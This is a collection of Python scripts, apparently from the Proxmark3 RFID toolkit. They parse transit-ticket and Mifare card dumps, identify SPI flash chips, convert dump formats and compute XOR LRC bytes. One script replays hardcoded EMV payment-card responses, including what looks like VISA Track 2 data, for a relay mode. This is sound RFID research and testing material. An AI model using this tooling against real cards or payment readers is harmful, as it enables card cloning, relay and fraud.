def Describe_Usage_Generic(Usage, ContractMediumEndDate, Certificate):
    print('  !!! GENERIC DUMP - please provide full file dump to benjamin@gentilkiwi.com - especially if NOT empty !!!')
    print('  left...                    :', Usage.nom_bits_left())
    print('  [CER] Usage                : {:04x}'.format(Certificate.nom(16)))
    print('  !!! Trying Usage_1 (the most common) !!!')
    Usage.reset()
    Certificate.reset()
    Describe_Usage_1(Usage, ContractMediumEndDate, Certificate)

class InterticHelper(NamedTuple):
    OrganizationalAuthority: str
    ContractProvider: str
    UsageDescribeFunction: callable = None

ISO_Countries = {
    0x250: 'France',
    0x504: 'Maroc',
}

FRA_OrganizationalAuthority_Contract_Provider = {
    0x000: {
        5: InterticHelper('Lille', 'Ilévia / Keolis', Describe_Usage_1_1),
        7: InterticHelper('Lens-Béthune', 'Tadao / Transdev', Describe_Usage_1_1),
    },
    0x006: {
        1: InterticHelper('Amiens', 'Ametis / Keolis'),
    },
    0x008: {
        15: InterticHelper('Angoulême', 'STGA', Describe_Usage_1_1), # May have a problem with date ?
    },
    0x013: {
        1: InterticHelper('Avignon', 'Orizo'),
    },
    0x021: {
        1: InterticHelper('Bordeaux', 'TBM / Keolis', Describe_Usage_1_1),
    },
    0x057: {
        1: InterticHelper('Lyon', 'TCL / Keolis', Describe_Usage_1), # Strange usage ?, kept on generic 1
    },
    0x072: {
        1: InterticHelper('Tours', 'filbleu / Keolis', Describe_Usage_1_1),
    },
    0x078: {
        4: InterticHelper('Reims', 'Citura / Transdev', Describe_Usage_1_2),
    },
    0x091: {
        1: InterticHelper('Strasbourg', 'CTS', Describe_Usage_4), # More dump needed, not only tram !
        5: InterticHelper('Strasbourg', 'CTS / new', Describe_Usage_4), # More dump needed, not only tram !
    },
    0x502: {
        83: InterticHelper('Annecy', 'Sibra', Describe_Usage_2),
        84: InterticHelper('Bourg-en-Bresse', 'Rubis / Keolis'),
        10: InterticHelper('Clermont-Ferrand', 'T2C'),
    },
    0x907: {
        1: InterticHelper('Dijon', 'Divia / Keolis'),
    },
    0x908: {
        1: InterticHelper('Rennes', 'STAR / Keolis', Describe_Usage_2),
        8: InterticHelper('Saint-Malo', 'MAT / RATP', Describe_Usage_1_1),
    },
    0x911: {
        5: InterticHelper('Besançon', 'Ginko / Keolis'),
    },
    0x912: {
        3: InterticHelper('Le Havre', 'Lia / Transdev', Describe_Usage_1_1),
        35: InterticHelper('Cherbourg-en-Cotentin', 'Cap Cotentin / Transdev'),
    },
    0x913: {
        3: InterticHelper('Nîmes', 'Tango / Transdev', Describe_Usage_3),
    },
    0x915: {
        1: InterticHelper('Metz', 'Le Met\' / TAMM'),
    },
    0x917: {
        4: InterticHelper('Angers', 'Irigo / RATP', Describe_Usage_1_2),
        7: InterticHelper('Saint-Nazaire', 'Stran'),
    },
}

MAR_OrganizationalAuthority_Contract_Provider = {
    0x001: {
        1: InterticHelper('Casablanca', 'Casa Transports / RATP', Describe_Usage_2_1),
    },
}

def main():

    print('Basic script to try to interpret Intertic data on ST25TB / SRT512 in french transports')
    print('--------------------------------------------------------------------------------------\n')

    if(len(sys.argv) != 2):
        print('\tUsage  : {0} <dumpfile.bin>\n\tExample: {0} hf-14b-D00233787DFBB4D5-dump.bin\n'.format(sys.argv[0]))
        return 1

    binaryDumpFileName = sys.argv[1]

    data = BitMe()

    print('Using \'{}\' as binary dump file...'.format(binaryDumpFileName))
    file = open(binaryDumpFileName, mode='rb')

    file.seek(0, os.SEEK_END)
    size = file.tell()
    file.seek(0, os.SEEK_SET)

    if (size != 68):
        print('\'{}\' file size is not 68 bytes'.format(binaryDumpFileName))
        return 2

    while True:
        chunk = file.read(4)
        if not chunk:
            break
        data.addBytes(chunk[::-1])

    file.close()

    Distribution_Data = BitMe()
    Block0Left = BitMe()
    # Usage_DAT = BitMe()
    # Usage_CER = BitMe()
    Usage_A_DAT = BitMe()
    Usage_A_CER = BitMe()
    Usage_B_DAT = BitMe()
    Usage_B_CER = BitMe()
    Distribution_Cer = BitMe()

    SWAP = None
    RELOADING1 = None
    COUNTER1 = None
    # RELOADING2 = None
    # COUNTER2 = None
    Describe_Usage = None

    Block0Left.addBits(data.nom_bits(23))
    KeyId = data.nom(4)
    PID = data.nom(5)

    match PID:

        case 0x10:
            Distribution_Data.addBits(data.nom_bits(2 * 32))
            Distribution_Data.addBits(Block0Left.nom_bits_left())
            Usage_A_DAT.addBits(data.nom_bits(2 * 32))
            RELOADING1 = data.nom(8)
            COUNTER1 = data.nom(24)
            SWAP = data.nom(32)
            Usage_A_DAT.addBits(data.nom_bits(2 * 32))
            Usage_A_DAT.addBits(data.nom_bits(16))
            Usage_A_CER.addBits(data.nom_bits(16))
            Usage_B_DAT.addBits(data.nom_bits(4 * 32))
            Usage_B_DAT.addBits(data.nom_bits(16))
            Usage_B_CER.addBits(data.nom_bits(16))
            Distribution_Cer.addBits(data.nom_bits(32))

        case 0x11 | 0x19:
            Distribution_Data.addBits(data.nom_bits(4 * 32))
            Distribution_Data.addBits(Block0Left.nom_bits_left())
            RELOADING1 = data.nom(8)
            COUNTER1 = data.nom(24)
            SWAP = data.nom(32)
            Usage_A_DAT.addBits(data.nom_bits(3 * 32))
            Usage_A_DAT.addBits(data.nom_bits(16))
            Usage_A_CER.addBits(data.nom_bits(16))
            Usage_B_DAT.addBits(data.nom_bits(3 * 32))
            Usage_B_DAT.addBits(data.nom_bits(16))
            Usage_B_CER.addBits(data.nom_bits(16))
            Distribution_Cer.addBits(data.nom_bits(32))

        case _:
            print('PID not (yet?) supported: 0x{:02x}'.format(PID))
            return 3


    print('PID (product): 0x{:02x} (flipflop?: {})'.format(PID, (PID & 0x10) != 0))
    print('KeyId        : 0x{:1x}'.format(KeyId))
    print()

    '''
    DISTRIBUTION
    ------------
    Not very well documented but seems standard for this part
    '''
    if not Distribution_Data.isEmpty():

        ContractNetworkId = Distribution_Data.nom_bits(24)
        CountryCode = ba2int(ContractNetworkId[0:0+12])
        OrganizationalAuthority = ba2int(ContractNetworkId[12:12+12])

        ContractApplicationVersionNumber = Distribution_Data.nom(6)
        ContractProvider = Distribution_Data.nom(8)
        ContractTariff = Distribution_Data.nom(16)
        ContractMediumEndDate = Distribution_Data.nom(14)

        Distribution_left = Distribution_Data.nom_bits_left()

        print('DISTRIBUTION')
        print('  CountryCode                     : {:03x} - {}'.format(CountryCode, ISO_Countries.get(CountryCode, '?')))
        print('  OrganizationalAuthority         : {:03x}'.format(OrganizationalAuthority))
        print('  ContractApplicationVersionNumber:', ContractApplicationVersionNumber)
        print('  ContractProvider                :', ContractProvider)

        if (CountryCode == 0x250):
            oa = FRA_OrganizationalAuthority_Contract_Provider.get(OrganizationalAuthority)
        elif (CountryCode == 0x504):
            oa = MAR_OrganizationalAuthority_Contract_Provider.get(OrganizationalAuthority)
        else:
            oa = None

        if (oa is not None):
            s = oa.get(ContractProvider)
            if (s is not None):
                print('      ~ Authority & Provider ~    : {} ({})'.format(s.OrganizationalAuthority, s.ContractProvider))
                Describe_Usage = s.UsageDescribeFunction

        print('  ContractTariff                  :', ContractTariff)
        print('  ContractMediumEndDate           : {} ({})'.format(ContractMediumEndDate, (datetime(1997, 1, 1) + timedelta(days = ContractMediumEndDate)).strftime('%Y-%m-%d')))
        print('  left...                         :', Distribution_left)
        print('  [CER] Distribution              : {:08x}'.format(Distribution_Cer.nom(32)))
        print()

        if(Describe_Usage is None):
            Describe_Usage = Describe_Usage_Generic

        if COUNTER1 is not None:
            print('[1] Counter: 0x{:06x}   - Reloading available: 0x{:02x}'.format(COUNTER1, RELOADING1))
        # if COUNTER2 is not None:
        #    print('[2] Counter: 0x{:06x}   - Reloading available: 0x{:02x}'.format(COUNTER2, RELOADING2))
        if SWAP is not None:
            print('[S] SWAP   : 0x{:08x} - last usage on USAGE_{}'.format(SWAP, 'B' if SWAP & 0b1 else 'A'))


        '''
        USAGE
        -----
        No real documentation about Usage
        Nearly all is left... - did not seen implementation with 2 counters or 1 Usage
        '''

        if not Usage_A_DAT.isEmpty():
            print()
            print('USAGE_A')
            Describe_Usage(Usage_A_DAT, ContractMediumEndDate, Usage_A_CER)

        if not Usage_B_DAT.isEmpty():
            print()
            print('USAGE_B')
            Describe_Usage(Usage_B_DAT, ContractMediumEndDate, Usage_B_CER)


    return 0


if __name__ == '__main__':
    sys.exit(main())



#!/usr/bin/env python3
# -*- coding: utf-8 -*-

#  mfdread.py - Mifare dumps parser in human readable format
#  Pavel Zhovner <pavel@zhovner.com>
#  https://github.com/zhovner/mfdread
#
#Dependencies:
#   easy_install bitstring
#or
#   pip install bitstring
#Usage:
#   pm3_mfdread.py ./dump.mfd
#

import codecs
import copy
import sys
from collections import defaultdict

try:
    from bitstring import BitArray
except ModuleNotFoundError:
    print("Please install bitstring module first.")
    sys.exit(1)

class Options:
    FORCE_1K = False


if len(sys.argv) == 1:
    sys.exit('''
------------------
Usage: pm3_mfdread.py ./dump.mfd
Mifare dumps reader.
''')


def decode(bytes):
    decoded = codecs.decode(bytes, "hex")
    try:
        return str(decoded, "utf-8").rstrip(b'\0')
    except:
        return ""


class bashcolors:
    BLUE = '\033[34m'
    RED = '\033[91m'
    GREEN = '\033[32m'
    WARNING = '\033[93m'
    ENDC = '\033[0m'


def accbits_for_blocknum(accbits_str, blocknum):
    '''
    Decodes the access bit string for block "blocknum".
    Returns the three access bits for the block or False if the
    inverted bits do not match the access bits.
    '''
    bits = BitArray([0])
    inverted = BitArray([0])

    # Block 0 access bits
    if blocknum == 0:
        bits = BitArray([accbits_str[11], accbits_str[23], accbits_str[19]])
        inverted = BitArray([accbits_str[7], accbits_str[3], accbits_str[15]])

    # Block 0 access bits
    elif blocknum == 1:
        bits = BitArray([accbits_str[10], accbits_str[22], accbits_str[18]])
        inverted = BitArray([accbits_str[6], accbits_str[2], accbits_str[14]])
    # Block 0 access bits
    elif blocknum == 2:
        bits = BitArray([accbits_str[9], accbits_str[21], accbits_str[17]])
        inverted = BitArray([accbits_str[5], accbits_str[1], accbits_str[13]])
    # Sector trailer / Block 3 access bits
    elif blocknum in (3, 15):
        bits = BitArray([accbits_str[8], accbits_str[20], accbits_str[16]])
        inverted = BitArray([accbits_str[4], accbits_str[0], accbits_str[12]])

    # Check the decoded bits
    inverted.invert()
    if bits.bin == inverted.bin:
        return bits
    else:
        return False


def accbits_to_permission_sector(accbits):
    permissions = {
        '000': "- A | A   - | A A [read B]",
        '010': "- - | A   - | A - [read B]",
        '100': "- B | A/B - | - B",
        '110': "- - | A/B - | - -",
        '001': "- A | A   A | A A [transport]",
        '011': "- B | A/B B | - B",
        '101': "- - | A/B B | - -",
        '111': "- - | A/B - | - -",
    }
    if isinstance(accbits, BitArray):
        return permissions.get(accbits.bin, "unknown")
    else:
        return ""


def accbits_to_permission_data(accbits):
    permissions = {
        '000': "A/B | A/B   | A/B | A/B [transport]",
        '010': "A/B |  -    |  -  |  -  [r/w]",
        '100': "A/B |   B   |  -  |  -  [r/w]",
        '110': "A/B |   B   |   B | A/B [value]",
        '001': "A/B |  -    |  -  | A/B [value]",
        '011': "  B |   B   |  -  |  -  [r/w]",
        '101': "  B |  -    |  -  |  -  [r/w]",
        '111': " -  |  -    |  -  |  -  [r/w]",
    }
    if isinstance(accbits, BitArray):
        return permissions.get(accbits.bin, "unknown")
    else:
        return ""


def accbit_info(accbits, sector_size):
    '''
    Returns  a dictionary of a access bits for all three blocks in a sector.
    If the access bits for block could not be decoded properly, the value is set to False.
    '''
    access_bits = defaultdict(lambda: False)

    if sector_size == 15:
        access_bits[sector_size] = accbits_for_blocknum(accbits, sector_size)
        return access_bits

    # Decode access bits for all 4 blocks of the sector
    for i in range(0, 4):
        access_bits[i] = accbits_for_blocknum(accbits, i)
    return access_bits


def print_info(data):
    blocksmatrix = []
    blockrights = {}
    block_number = 0

    data_size = len(data)

    if data_size not in {4096, 1024}:
        sys.exit("Wrong file size: %d bytes.\nOnly 1024 or 4096 allowed." % len(data))

    if Options.FORCE_1K:
        data_size = 1024

    # read all sectors
    sector_number = 0
    start = 0
    end = 64
    while True:
        sector = data[start:end]
        sector = codecs.encode(sector, 'hex')
        if not isinstance(sector, str):
            sector = str(sector, 'ascii')
        sectors = [sector[x:x + 32] for x in range(0, len(sector), 32)]

        blocksmatrix.append(sectors)

        # after 32 sectors each sector has 16 blocks instead of 4
        sector_number += 1
        if sector_number < 32:
            start += 64
            end += 64
        elif sector_number == 32:
            start += 64
            end += 256
        else:
            start += 256
            end += 256

        if start == data_size:
            break

    blocksmatrix_clear = copy.deepcopy(blocksmatrix)

    # add colors for each keyA, access bits, KeyB
    for c in range(0, len(blocksmatrix)):
        sector_size = len(blocksmatrix[c]) - 1

        # Fill in the access bits
        blockrights[c] = accbit_info(BitArray('0x' + blocksmatrix[c][sector_size][12:20]), sector_size)

        # Prepare colored output of the sector trailor
        keyA = bashcolors.RED + blocksmatrix[c][sector_size][0:12] + bashcolors.ENDC
        accbits = bashcolors.GREEN + blocksmatrix[c][sector_size][12:20] + bashcolors.ENDC
        keyB = bashcolors.BLUE + blocksmatrix[c][sector_size][20:32] + bashcolors.ENDC

        blocksmatrix[c][sector_size] = keyA + accbits + keyB

    print("File size: %d bytes. Expected %d sectors" % (len(data), sector_number))
    print("\n\tUID:  " + blocksmatrix[0][0][0:8])
    print("\tBCC:  " + blocksmatrix[0][0][8:10])
    print("\tSAK:  " + blocksmatrix[0][0][10:12])
    print("\tATQA: " + blocksmatrix[0][0][12:14])
    print("                   %sKey A%s    %sAccess Bits%s    %sKey B%s" % (
        bashcolors.RED, bashcolors.ENDC, bashcolors.GREEN, bashcolors.ENDC, bashcolors.BLUE, bashcolors.ENDC))
    print("╔═════════╦═══════╦══════════════════════════════════╦════════╦═════════════════════════════════════╗")
    print("║  Sector ║ Block ║            Data                  ║ Access ║   A | Acc.  | B                     ║")
    print("║         ║       ║                                  ║        ║ r w | r   w | r w [info]            ║")
    print("║         ║       ║                                  ║        ║  r  |  w    |  i  | d/t/r           ║")

    for q in range(0, len(blocksmatrix)):
        print("╠═════════╬═══════╬══════════════════════════════════╬════════╬═════════════════════════════════════╣")
        n_blocks = len(blocksmatrix[q])

        # z is the block in each sector
        for z in range(0, len(blocksmatrix[q])):

            # Format the access bits. Print ERR in case of an error
            if isinstance(blockrights[q][z], BitArray):
                accbits = bashcolors.GREEN + blockrights[q][z].bin + bashcolors.ENDC
            else:
                accbits = bashcolors.WARNING + "ERR" + bashcolors.ENDC

            if q == 0 and z == 0:
                permissions = "-"

            elif z == n_blocks - 1:
                permissions = accbits_to_permission_sector(blockrights[q][z])
            else:
                permissions = accbits_to_permission_data(blockrights[q][z])

            # Print the sector number in the second third row
            if z == 2:
                qn = q
            else:
                qn = ""

            print("║    %-5s║  %-3d  ║ %s ║  %s   ║ %-35s ║ %s" % (qn, block_number, blocksmatrix[q][z],
                                                                   accbits, permissions,
                                                                   decode(blocksmatrix_clear[q][z])))

            block_number += 1

    print("╚═════════╩═══════╩══════════════════════════════════╩════════╩═════════════════════════════════════╝")


def main(args):
    if args[0] == '-n':
        args.pop(0)
        bashcolors.BLUE = ""
        bashcolors.RED = ""
        bashcolors.GREEN = ""
        bashcolors.WARNING = ""
        bashcolors.ENDC = ""

    if args[0] == '-1':
        args.pop(0)
        Options.FORCE_1K = True

    filename = args[0]
    with open(filename, "rb") as f:
        data = f.read()
        print_info(data)


if __name__ == "__main__":
    main(sys.argv[1:])



#!/usr/bin/env python3

import re
import pm3
# optional color support
try:
    # pip install ansicolors
    from colors import color
except ModuleNotFoundError:
    def color(s, fg=None):
        _ = fg
        return str(s)

spi = {
    0x68:{
        "manufacturer": "Boya",
        "jedec" : {
            0x40: {
                0x15: {
                    "part": "BY25Q16BS",
                    "size": "16mbits",
                    "sizeB": "2MB",
                    },
                },
            },
        },
    0x85:{
        "manufacturer": "Puya",
        "jedec" : {
            0x60: {
                0x15: {
                    "part": "P25Q16H",
                    "size": "16mbits",
                    "sizeB": "2MB",
                    },
                0x16: {
                    "part": "P25Q32H",
                    "size": "32mbits",
                    "sizeB": "4MB",
                    },
                0x17: {
                    "part": "P25Q64H",
                    "size": "64mbits",
                    "sizeB": "8MB",
                    },
                },
            },
        },
    0xEF:{
        "manufacturer": "Winbond",
        "jedec" : {
            0x30: {
                0x11: {
                    "part": "W25X10BV",
                    "size": "1mbits",
                    "sizeB": "128KB",
                    },
                0x12: {
                    "part": "W25X20BV",
                    "size": "2mbits",
                    "sizeB": "256KB",
                    },
                0x13: {
                    "part": "W25X40BV",
                    "size": "4mbits",
                    "sizeB": "512KB",
                    },
                },
            0x40: {
                0x12: {
                    "part": "W25Q20BV",
                    "size": "2mbits",
                    "sizeB": "256KB",
                    },
                0x13: {
                    "part": "W25Q40BV",
                    "size": "4mbits",
                    "sizeB": "512KB",
                    },
                0x14: {
                    "part": "W25Q80BV",
                    "size": "8mbits",
                    "sizeB": "1MB",
                    },
                0x15: {
                    "part": "W25Q16BV",
                    "size": "16mbits",
                    "sizeB": "2MB",
                    },
                0x16: {
                    "part": "W25Q32BV",
                    "size": "32mbits",
                    "sizeB": "4MB",
                    },
                0x17: {
                    "part": "W25Q64BV",
                    "size": "64mbits",
                    "sizeB": "8MB",
                    },
                },
            0x70: {
                0x14: {
                    "part": "W25Q80JV",
                    "size": "8mbits",
                    "sizeB": "1MB",
                    },
                0x15: {
                    "part": "W25Q16JV",
                    "size": "16mbits",
                    "sizeB": "2MB",
                    },
                0x16: {
                    "part": "W25Q32JV",
                    "size": "32mbits",
                    "sizeB": "4MB",
                    },
                0x17: {
                    "part": "W25Q64JV",
                    "size": "64mbits",
                    "sizeB": "8MB",
                    },
                0x22: {
                    "part": "W25Q02JV-IM",
                    "size": "2mbits",
                    "sizeB": "256KB",
                    },
                },
            },
        },
    }

p = pm3.pm3()

p.console("hw status")

rex = re.compile("...\\s([0-9a-fA-F]{2})\\s/\\s([0-9a-fA-F]{4})")

for line in p.grabbed_output.split('\n'):
    # [#]   JEDEC Mfr ID / Dev ID... 85 / 6015
    if " JEDEC " not in line:
        continue

    match = re.findall(rex, line)
    mid = int(match[0][0], 16)
    did = int(match[0][1], 16)
    did_h = did >> 8
    did_l = did & 0xff
    t = None
    print(f"\n JEDEC ID....... 0x{mid:X} / 0x{did:X}")
    if mid in spi:

        mfr = spi[mid]['manufacturer']

        if did_h in spi[mid]['jedec']:

            if did_l in spi[mid]['jedec'][did_h]:

                t = spi[mid]['jedec'][did_h][did_l]
                print("\n Manufacturer... " + color(f"{mfr}", fg="green") +
                     "\n Device......... " + color(f"{t['part']}", fg="green") +
                     "\n Size........... " + color(f"{t['size']} ({t['sizeB']})", fg="yellow")
                     )
            else:
                print("\n Manufacturer... " + color(f"{mfr}", fg="green") +
                     "\n Device ID...... " + color(f"{did:04X}h (unknown)", fg="red"))
        else:
            print("\n Manufacturer... " + color(f"{mfr}", fg="green") +
                 "\n Device ID...... " + color(f"{did:04X}h (unknown)", fg="red"))
    else:
        print("\n Manufacturer... " + color(f"{mid:02X}h (unknown)", fg="red") +
             "\n Device ID...... " + color(f"{did:04X}h (unknown)", fg="red"))



#!/usr/bin/env python3

"""
//-----------------------------------------------------------------------------
// Salvador Mendoza (salmg.net), 2021
//
// This code is licensed to you under the terms of the GNU GPL, version 2 or,
// at your option, any later version. See the LICENSE.txt file for the text of
// the license.
//-----------------------------------------------------------------------------
// Code to test Proxmark3 Standalone mode aka reblay by Salvador Mendoza
//-----------------------------------------------------------------------------
"""

import serial
from smartcard.util import toHexString, toBytes
from smartcard.CardType import AnyCardType
from smartcard.CardRequest import CardRequest

ser = serial.Serial('/dev/rfcomm0')  # open Proxmark3 Bluetooth port

def pd(data):
        rapdu = map(ord, data)
        return rapdu

apdu = [
        [0x6F, 0x23, 0x84, 0x0E, 0x32, 0x50, 0x41, 0x59, 0x2E, 0x53, 0x59, 0x53, 0x2E, 0x44, 0x44, 0x46, 0x30, 0x31, 0xA5, 0x11, 0xBF, 0x0C, 0x0E, 0x61, 0x0C, 0x4F, 0x07, 0xA0, 0x00, 0x00, 0x00, 0x03, 0x10, 0x10, 0x87, 0x01, 0x01, 0x90, 0x00],
        [0x6F, 0x1E, 0x84, 0x07, 0xA0, 0x00, 0x00, 0x00, 0x03, 0x10, 0x10, 0xA5, 0x13, 0x50, 0x0B, 0x56, 0x49, 0x53, 0x41, 0x20, 0x43, 0x52, 0x45, 0x44, 0x49, 0x54, 0x9F, 0x38, 0x03, 0x9F, 0x66, 0x02, 0x90, 0x00],
        [0x80, 0x06, 0x00, 0x80, 0x08, 0x01, 0x01, 0x00, 0x90, 0x00],
        [0x70,0x15,0x57,0x13,0x46,0x50,0x98,0x29,0x81,0x62,0x29,0x58,0xd2,0x40,0x32,0x01,0x14,0x69,0x00,0x00,0x13,0x83,0x44,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xd0,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x8f,0x90,0x00],
        [0x6f, 0x00],
        [0x6f, 0x00]
]

print('Testing code: bluetooth has to be connected with the right rfcomm port!')
print('Waiting for data...')
initd = ser.read(1)

bufferlen = pd(initd)[0]
rping = ser.read(bufferlen)
ping = pd(rping)

print('Terminal command:'),
print(toHexString(ping))

for x in apdu:
        print('Sending cmd: '),
        ser.write(x)
        print(toHexString(x))
        print('--')

        lenpk = ser.read(1) #first byte is the buffer length
        bufferlen = pd(lenpk)[0]

        buffer = pd(ser.read(bufferlen))
        print('Terminal command:'),
        print(toHexString(buffer))



#!/usr/bin/env python3

from tempfile import mkdtemp
from shutil import rmtree
from string import hexdigits
import unittest, os
import pm3_eml2mfd, pm3_mfd2eml

class TestEmlMfd(unittest.TestCase):
    def setUp(self):
        self.tmpdir = mkdtemp()

    def tearDown(self):
        rmtree(self.tmpdir)

    EML2MFD_TESTCASES = [
            ('', ''),
            ("41424344\r\n45464748\n494A4B4C\n", "ABCDEFGHIJKL")
            ]
    def test_eml2mfd(self):
        self.three_argument_test(pm3_eml2mfd.main, self.EML2MFD_TESTCASES)

    def test_mfd2eml(self):
        self.three_argument_test(pm3_mfd2eml.main,
                map(reversed, self.EML2MFD_TESTCASES), c14n=hex_c14n)

    def three_argument_test(self, operation, cases, c14n=str):
        for case_input, case_output in cases:
            try:
                inp_name = os.path.join(self.tmpdir, 'input')
                out_name = os.path.join(self.tmpdir, 'output')
                with open(inp_name, 'w') as in_file:
                    in_file.write(case_input)
                operation(['', inp_name, out_name])
                with open(out_name, 'r') as out_file:
                    self.assertEqual(c14n(case_output), c14n(out_file.read()))
            finally:
                for file_name in inp_name, out_name:
                    if os.path.exists(file_name):
                        os.remove(file_name)


def hex_c14n(inp):
    """
    Canonicalizes the input string by removing non-hexadecimal
    characters and making everything uppercase
    """
    return ''.join(c.upper() for c in inp if c in hexdigits)

if __name__ == '__main__':
    unittest.main()



#!/usr/bin/env python3
"""
PM3 Help 2 JSON

This script takes the full text help output from the PM3 client and converts it to JSON.

Authors / Maintainers:
 - Samuel Windall

Note:
    This file is used during the pm3 client build
    any changes to the call script parameters should be reflected in the makefile
"""

import re
import json
import datetime
import argparse
import logging

##############################################################################
# Script version data: (Please increment when making updates)

APP_NAME = 'PM3Help2JSON'

VERSION_MAJOR = 1
VERSION_MINOR = 0

##############################################################################
# Main Application Code:


def main():
    """The main function for the script"""
    args = build_arg_parser().parse_args()
    logging_format = '%(message)s'
    if args.debug:
        logging.basicConfig(level=logging.DEBUG, format=logging_format)
    else:
        logging.basicConfig(level=logging.WARN, format=logging_format)
    logging.info(f'{get_version()} starting...')
    help_text = args.input_file.read()
    command_data = parse_all_command_data(help_text)
    meta_data = build_metadata(args.meta, command_data)
    output_data = {
        'metadata': meta_data,
        'commands': command_data,
    }
    json.dump(output_data, args.output_file, indent=4, sort_keys=True)
    args.output_file.write("\n") # add trailing newline as json.dump does not
    logging.info(f'{get_version()} completed!')


def build_arg_parser():
    """Build the argument parser for reading the program arguments"""
    parser = argparse.ArgumentParser()
    parser.add_argument('input_file', type=argparse.FileType('r'), help='Source of full text help from the PM3 client.')
    parser.add_argument('output_file', type=argparse.FileType('w'), help='Destination for JSON output.')
    parser.add_argument('--meta', action='append', help='Additional metadata to be included.', metavar='key:value')
    parser.add_argument('--version', '-v', action='version', version=get_version(), help='Version data about this app.')
    parser.add_argument('--debug', '-d', action='store_true', help='Log debug messages.')
    return parser


def build_help_regex():
    re_command = r'-{87}\n(?P<command>.+)\n'
    # Reads if the command is available offline
    re_offline = r'available offline: (?P<offline>yes|no)\n+'
    # Reads the description lines
    re_description = r'(?P<description>\n[\s\S]*?(?=usage:))'
    # Reads the usage string
    re_usage = r'(?:usage:\n(?P<usage>(?:.+\n)+)\n+)?'
    # Reads the options and there individual descriptions
    re_options = r'(?:options:\n(?P<options>(?:.+\n)+)\n+)?'
    # Reads the notes and examples
    re_notes = r'(?:examples\/notes:\n(?P<notes>[\s\S]*?(?=(===|---|\n\n))))'
    # Combine them into a single regex object
    re_full = re.compile(re_command+re_offline+re_description+re_usage+re_options+re_notes, re.MULTILINE)
    return re_full


def parse_all_command_data(help_text):
    """Turns the full text output of help data from the pm3 client into a list of dictionaries"""
    command_dicts = {}
    # Strip out ANSI escape sequences
    help_text = remove_ansi_escape_codes(help_text)
    # Find all commands in the full text help output
    matches = build_help_regex().finditer(help_text)
    for match in matches:
        # Turn a match into a dictionary with keys for the extracted fields
        command_object = parse_command_data(match)
        # Store this command against its name for easy lookup
        command_dicts[command_object['command']] = command_object
    return command_dicts


def parse_command_data(match):
    """Turns a regex match of a command in the help text and converts it into a dictionary"""
    logging.info('Parsing new command...')
    # Get and clean the command string
    command = remove_extra_whitespace(match.group('command'))
    logging.info(f'    Command: {command}')
    # Get the online status as a boolean. Note: the regex only picks up 'yes' or 'no' so this check is safe.
    offline = (match.group('offline') == 'yes')
    logging.debug(f'    Offline: {offline}')
    # Get and clean the description paragraph
    description = text_to_oneliner(match.group('description'))
    logging.debug(f'    Description: {description}')
    # Get and clen the usage string
    usage = text_to_oneliner(match.group('usage'))
    logging.debug(f'    Usage: {usage}')
    # Get and clean the list of options
    options = text_to_list(match.group('options'))
    logging.debug(f'    Options: {options}')
    # Get and clean the list of examples and notes
    notes = text_to_list(match.group('notes'))
    logging.debug(f'    Notes: {notes}')
    # Construct the command dictionary
    command_data = {
        'command': command,
        'offline': offline,
        'description': description,
        'usage': usage,
        'options': options,
        'notes': notes
    }
    logging.info('Completed parsing command!')
    return command_data


def build_metadata(extra_data, command_data):
    """Turns the full text output of help data from the pm3 client into a list of dictionaries."""
    logging.info('Building metadata...')
    metadata = {
        'extracted_by': get_version(),
        'extracted_on': datetime.datetime.utcnow().replace(microsecond=0).isoformat(),
        'commands_extracted': len(command_data)
    }
    for key, value in metadata.items():
        logging.debug(f'    {key} - {value}')
    if extra_data:
        for extra in extra_data:
            parts = extra.split(':')
            if len(parts) == 2:
                metadata[parts[0]] = parts[1]
                logging.debug(f'    {parts[0]} - {parts[1]}')
            else:
                logging.warning(f'Error building metadata. '
                                f'Skipped "{extra}". '
                                f'Extra metadata must be in the format "key:value".')
    logging.info('Completed building metadata!')
    return metadata


##############################################################################
# Helper Functions:


def get_version():
    """Get the version string for this script"""
    return f'{APP_NAME} v{VERSION_MAJOR}.{VERSION_MINOR:02}'


def remove_ansi_escape_codes(text):
    """Remove ANSI escape sequences that may be left in the text."""
    re_ansi_escape = re.compile(r'(\x9B|\x1B\[)[0-?]*[ -/]*[@-~]')
    return re_ansi_escape.sub('', str(text))


def remove_extra_whitespace(text):
    """Removes extra whitespace that may be in the text."""
    # Ensure input is a string
    text = str(text)
    # Remove whitespace from the start and end of the text
    text = text.strip()
    # Deduplicate spaces in the string
    text = re.sub(r' +', ' ', text)
    return text


def text_to_oneliner(text):
    """Converts a multi line string into a single line string and removes extra whitespace"""
    if text is None:
        return ""
    # Ensure input is a string
    text = str(text)
    # Replace newlines with spaces
    text = re.sub(r'\n+', ' ', text)
    # Remove the extra whitespace
    text = remove_extra_whitespace(text)
    return text


def text_to_list(text):
    """Converts a multi line string into a list of lines and removes extra whitespace"""
    if text is None:
        return []
    # Ensure input is a string
    text = str(text)
    # Get all the lines
    lines = text.strip().split('\n')
    # For each line clean up any extra whitespace
    return [remove_extra_whitespace(line) for line in lines]


##############################################################################
# Application entrypoint:

if __name__ == '__main__':
    main()



#  xorcheck.py - find xor values for 8-bit LRC
#
#  Adam Laurie <adam@algroup.co.uk>
#  http://rfidiot.org/
#
#  This code is copyright (c) Adam Laurie, 2009, All rights reserved.
#  For non-commercial use only, the following terms apply - for all other
#  uses, please contact the author:
#
#    This code is free software; you can redistribute it and/or modify
#    it under the terms of the GNU General Public License as published by
#    the Free Software Foundation; either version 2 of the License, or
#    (at your option) any later version.
#
#    This code is distributed in the hope that it will be useful,
#    but WITHOUT ANY WARRANTY; without even the implied warranty of
#    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
#    GNU General Public License for more details.
#
# 2020, Modified (@iceman1001)

import sys

def main():
    if(len(sys.argv) < 3):
        print("""
    \t{0} - Generate final byte for XOR LRC

    Usage: {0} <ID Byte1> <ID Byte2> ... <LRC>

    \tSpecifying the bytes of a UID with a known LRC will find the last byte value
    \tneeded to generate that LRC with a rolling XOR. All bytes should be specified in HEX.

    Example:

    \t{0} 04 00 80 64 ba

    Should produce the output:

    \tTarget (BA) requires final LRC XOR byte value: 5A\n""".format(sys.argv[0]))
        return 1

    target= int(sys.argv[len(sys.argv) - 1],16)

    lrc= 0x00
    for i in range(len(sys.argv) - 1):
        lrc ^= int(sys.argv[i + 1],16)
    print('\nTarget (%02X) requires final LRC XOR byte value: %02X\n' % (target,lrc))

if __name__ == "__main__":
    sys.exit(main())



#!/usr/bin/env python3
